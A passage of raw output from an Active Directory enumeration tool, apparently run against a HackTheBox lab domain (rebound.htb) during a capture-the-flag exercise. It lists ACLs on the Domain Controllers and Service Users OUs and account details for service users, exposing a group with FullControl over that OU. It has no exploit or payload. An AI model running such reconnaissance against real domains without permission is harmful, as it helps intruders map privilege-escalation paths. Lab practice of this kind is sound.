ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType               : User-Account-Restrictions
InheritanceType             : User
SecurityIdentifier          : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN                    : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : ReadProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType               : User-Logon
InheritanceType             : inetOrgPerson
SecurityIdentifier          : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN                    : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : ReadProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType               : User-Logon
InheritanceType             : User
SecurityIdentifier          : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN                    : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : ReadProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType               : Membership
InheritanceType             : inetOrgPerson
SecurityIdentifier          : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN                    : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : ReadProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType               : Membership
InheritanceType             : User
SecurityIdentifier          : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN                    : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : ReadProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType               : General-Information
InheritanceType             : inetOrgPerson
SecurityIdentifier          : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN                    : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : ReadProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType               : General-Information
InheritanceType             : User
SecurityIdentifier          : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN                    : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : ReadProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType               : RAS-Information
InheritanceType             : inetOrgPerson
SecurityIdentifier          : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN                    : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : ReadProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType               : RAS-Information
InheritanceType             : User
SecurityIdentifier          : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN                    : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask                  : ReadProperty, WriteProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT
ObjectAceType               : ms-DS-Key-Credential-Link
InheritanceType             : None
SecurityIdentifier          : REBOUND\Key Admins

ObjectDN                    : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask                  : ReadProperty, WriteProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT
ObjectAceType               : ms-DS-Key-Credential-Link
InheritanceType             : None
SecurityIdentifier          : REBOUND\Enterprise Key Admins

ObjectDN                    : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : Self
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType               : DS-Validated-Write-Compute
InheritanceType             : Computer
SecurityIdentifier          : Creator Owner

ObjectDN                    : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : Self
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType               : DS-Validated-Write-Compute
InheritanceType             : Computer
SecurityIdentifier          : Principal Self

ObjectDN                    : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : ReadProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType               : Token-Groups
InheritanceType             : Computer
SecurityIdentifier          : Enterprise Domain Controllers

ObjectDN                    : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : ReadProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType               : Token-Groups
InheritanceType             : Group
SecurityIdentifier          : Enterprise Domain Controllers

ObjectDN                    : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : ReadProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType               : Token-Groups
InheritanceType             : User
SecurityIdentifier          : Enterprise Domain Controllers

ObjectDN                    : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : WriteProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType               : ms-TPM-Tpm-Information-For-Computer
InheritanceType             : Computer
SecurityIdentifier          : Principal Self

ObjectDN                    : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : ReadProperty
ObjectAceFlags              : ACE_INHERITED_OBJECT_TYPE_PRESENT
InheritanceType             : inetOrgPerson
SecurityIdentifier          : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN                    : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : ReadProperty
ObjectAceFlags              : ACE_INHERITED_OBJECT_TYPE_PRESENT
InheritanceType             : Group
SecurityIdentifier          : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN                    : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : ReadProperty
ObjectAceFlags              : ACE_INHERITED_OBJECT_TYPE_PRESENT
InheritanceType             : User
SecurityIdentifier          : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN                    : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERITED_ACE, OBJECT_INHERIT_ACE
AccessMask                  : ReadProperty, WriteProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT
ObjectAceType               : ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity
InheritanceType             : None
SecurityIdentifier          : Principal Self

ObjectDN                    : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask                  : ControlAccess, ReadProperty, WriteProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT
ObjectAceType               : Private-Information
InheritanceType             : None
SecurityIdentifier          : Principal Self

ObjectDN                    : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERITED_ACE
ActiveDirectoryRights       : FullControl
AccessMask                  : FullControl
InheritanceType             : None
SecurityIdentifier          : REBOUND\Enterprise Admins

ObjectDN                    : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERITED_ACE
ActiveDirectoryRights       : ListChildObjects
AccessMask                  : ListChildObjects
InheritanceType             : None
SecurityIdentifier          : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN                    : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERITED_ACE
ActiveDirectoryRights       : ReadAndExecute
AccessMask                  : ReadAndExecute
InheritanceType             : None
SecurityIdentifier          : Administrators

(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > Get-DomainObjectAcl -Identity "OU=Service Users,DC=rebound,DC=htb"
ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : None
AccessMask                  : CreateChild, DeleteChild
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT
ObjectAceType               : inetOrgPerson
InheritanceType             : None
SecurityIdentifier          : Account Operators

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : None
AccessMask                  : CreateChild, DeleteChild
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT
ObjectAceType               : Computer
InheritanceType             : None
SecurityIdentifier          : Account Operators

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : None
AccessMask                  : CreateChild, DeleteChild
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT
ObjectAceType               : Group
InheritanceType             : None
SecurityIdentifier          : Account Operators

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : None
AccessMask                  : CreateChild, DeleteChild
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT
ObjectAceType               : Print-Queue
InheritanceType             : None
SecurityIdentifier          : Print Operators

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : None
AccessMask                  : CreateChild, DeleteChild
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT
ObjectAceType               : User
InheritanceType             : None
SecurityIdentifier          : Account Operators

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_ACE
ACEFlags                    : None
ActiveDirectoryRights       : FullControl
AccessMask                  : FullControl
InheritanceType             : None
SecurityIdentifier          : REBOUND\Domain Admins

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_ACE
ACEFlags                    : None
ActiveDirectoryRights       : FullControl
AccessMask                  : FullControl
InheritanceType             : None
SecurityIdentifier          : REBOUND\ServiceMgmt

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_ACE
ACEFlags                    : None
ActiveDirectoryRights       : Read
AccessMask                  : Read
InheritanceType             : None
SecurityIdentifier          : Enterprise Domain Controllers

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_ACE
ACEFlags                    : None
ActiveDirectoryRights       : Read
AccessMask                  : Read
InheritanceType             : None
SecurityIdentifier          : Authenticated Users

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_ACE
ACEFlags                    : None
ActiveDirectoryRights       : FullControl
AccessMask                  : FullControl
InheritanceType             : None
SecurityIdentifier          : Local System

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : ReadProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType               : User-Account-Restrictions
InheritanceType             : inetOrgPerson
SecurityIdentifier          : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : ReadProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType               : User-Account-Restrictions
InheritanceType             : User
SecurityIdentifier          : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : ReadProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType               : User-Logon
InheritanceType             : inetOrgPerson
SecurityIdentifier          : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : ReadProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType               : User-Logon
InheritanceType             : User
SecurityIdentifier          : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : ReadProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType               : Membership
InheritanceType             : inetOrgPerson
SecurityIdentifier          : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : ReadProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType               : Membership
InheritanceType             : User
SecurityIdentifier          : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : ReadProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType               : General-Information
InheritanceType             : inetOrgPerson
SecurityIdentifier          : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : ReadProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType               : General-Information
InheritanceType             : User
SecurityIdentifier          : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : ReadProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType               : RAS-Information
InheritanceType             : inetOrgPerson
SecurityIdentifier          : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : ReadProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType               : RAS-Information
InheritanceType             : User
SecurityIdentifier          : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask                  : ReadProperty, WriteProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT
ObjectAceType               : ms-DS-Key-Credential-Link
InheritanceType             : None
SecurityIdentifier          : REBOUND\Key Admins

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask                  : ReadProperty, WriteProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT
ObjectAceType               : ms-DS-Key-Credential-Link
InheritanceType             : None
SecurityIdentifier          : REBOUND\Enterprise Key Admins

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : Self
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType               : DS-Validated-Write-Compute
InheritanceType             : Computer
SecurityIdentifier          : Creator Owner

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : Self
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType               : DS-Validated-Write-Compute
InheritanceType             : Computer
SecurityIdentifier          : Principal Self

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : ReadProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType               : Token-Groups
InheritanceType             : Computer
SecurityIdentifier          : Enterprise Domain Controllers

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : ReadProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType               : Token-Groups
InheritanceType             : Group
SecurityIdentifier          : Enterprise Domain Controllers

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : ReadProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType               : Token-Groups
InheritanceType             : User
SecurityIdentifier          : Enterprise Domain Controllers

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : WriteProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType               : ms-TPM-Tpm-Information-For-Computer
InheritanceType             : Computer
SecurityIdentifier          : Principal Self

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : ReadProperty
ObjectAceFlags              : ACE_INHERITED_OBJECT_TYPE_PRESENT
InheritanceType             : inetOrgPerson
SecurityIdentifier          : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : ReadProperty
ObjectAceFlags              : ACE_INHERITED_OBJECT_TYPE_PRESENT
InheritanceType             : Group
SecurityIdentifier          : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : ReadProperty
ObjectAceFlags              : ACE_INHERITED_OBJECT_TYPE_PRESENT
InheritanceType             : User
SecurityIdentifier          : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERITED_ACE, OBJECT_INHERIT_ACE
AccessMask                  : ReadProperty, WriteProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT
ObjectAceType               : ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity
InheritanceType             : None
SecurityIdentifier          : Principal Self

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask                  : ControlAccess, ReadProperty, WriteProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT
ObjectAceType               : Private-Information
InheritanceType             : None
SecurityIdentifier          : Principal Self

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERITED_ACE
ActiveDirectoryRights       : FullControl
AccessMask                  : FullControl
InheritanceType             : None
SecurityIdentifier          : REBOUND\Enterprise Admins

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERITED_ACE
ActiveDirectoryRights       : ListChildObjects
AccessMask                  : ListChildObjects
InheritanceType             : None
SecurityIdentifier          : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERITED_ACE
ActiveDirectoryRights       : ReadAndExecute
AccessMask                  : ReadAndExecute
InheritanceType             : None
SecurityIdentifier          : Administrators

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_ACE
ACEFlags                    : None
ActiveDirectoryRights       : FullControl
AccessMask                  : FullControl
InheritanceType             : None
SecurityIdentifier          : REBOUND\ServiceMgmt

(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > Get-DomainObject -SearchBase "OU=Service Users,DC=rebound,DC=htb"
objectClass                       : top
                                    person
                                    organizationalPerson
                                    user
cn                                : batch_runner
distinguishedName                 : CN=batch_runner,OU=Service Users,DC=rebound,DC=htb
instanceType                      : 4
whenCreated                       : 08/04/2023 09:07:56 (1 year, 11 months ago)
whenChanged                       : 04/04/2025 13:33:02 (today)
uSNCreated                        : 69335
uSNChanged                        : 185426
name                              : batch_runner
objectGUID                        : {fa00c3b6-5e6a-48b9-9fe0-897389addf60}
userAccountControl                : NORMAL_ACCOUNT [66048]
                                    DONT_EXPIRE_PASSWORD
badPwdCount                       : 1
codePage                          : 0
countryCode                       : 0
badPasswordTime                   : 04/04/2025 12:32:25 (today)
lastLogoff                        : 1601-01-01 00:00:00+00:00
lastLogon                         : 09/04/2023 10:22:12 (1 year, 11 months ago)
logonHours                        : ////////////////////////////
pwdLastSet                        : 04/04/2025 13:33:00 (today)
primaryGroupID                    : 513
objectSid                         : S-1-5-21-4078382237-1492182817-2568127209-7685
accountExpires                    : 1601-01-01 00:00:00+00:00
logonCount                        : 11
sAMAccountName                    : batch_runner
sAMAccountType                    : SAM_USER_OBJECT
objectCategory                    : CN=Person,CN=Schema,CN=Configuration,DC=rebound,DC=htb
dSCorePropagationData             : 04/04/2025
                                    04/04/2025
                                    04/04/2025
                                    04/04/2025
                                    01/01/1601
lastLogonTimestamp                : 09/04/2023 10:07:10 (1 year, 11 months ago)

objectClass                       : top
                                    person
                                    organizationalPerson
                                    user
cn                                : winrm_svc
distinguishedName                 : CN=winrm_svc,OU=Service Users,DC=rebound,DC=htb
instanceType                      : 4
whenCreated                       : 08/04/2023 09:07:56 (1 year, 11 months ago)
whenChanged                       : 04/04/2025 13:33:02 (today)
uSNCreated                        : 69329
memberOf                          : CN=Remote Management Users,CN=Builtin,DC=rebound,DC=htb
uSNChanged                        : 185427
name                              : winrm_svc
objectGUID                        : {e3c7114f-5864-4115-b3fb-4587e25790f5}
userAccountControl                : NORMAL_ACCOUNT [66048]
                                    DONT_EXPIRE_PASSWORD
badPwdCount                       : 0
codePage                          : 0
countryCode                       : 0
badPasswordTime                   : 04/04/2025 12:32:25 (today)
lastLogoff                        : 1601-01-01 00:00:00+00:00
